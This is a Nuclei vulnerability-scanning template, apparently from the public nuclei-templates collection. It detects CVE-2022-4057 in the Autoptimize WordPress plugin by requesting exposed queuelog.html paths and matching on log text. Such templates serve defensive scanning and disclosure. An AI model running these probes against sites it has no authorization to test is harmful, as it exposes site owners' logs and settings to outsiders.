nuclei-templates/http/cves/2022/CVE-2022-4057.yaml

54 lines
1.8 KiB
YAML

id: CVE-2022-4057
info:
name: Autoptimize < 3.1.0 - Information Disclosure
author: DhiyaneshDK
severity: medium
description: |
The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.
impact: |
An attacker can gain access to sensitive information, potentially leading to further attacks.
remediation: |
Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability.
reference:
- https://wpscan.com/vulnerability/95ee1b9c-1971-4c35-8527-5764e9ed64af
- https://wordpress.org/plugins/autoptimize/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4057
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-4057
cwe-id: CWE-425
epss-score: 0.00125
epss-percentile: 0.46949
cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: optimizingmatters
product: autooptimize
framework: wordpress
publicwww-query: /wp-content/plugins/autoptimize
tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html"
- "{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Job id &lt;'
- 'log messages'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100a0bf6688a368fac230bd01722ccc5ff4a0094c997d4bc9e929424d1b2811d3d6022100dbac1fd1415a66ee1b95e9b5ae6303e3cb1fed954b0b80af47c8665c3c6db65a:922c64590222798bb761d5b6d8e72950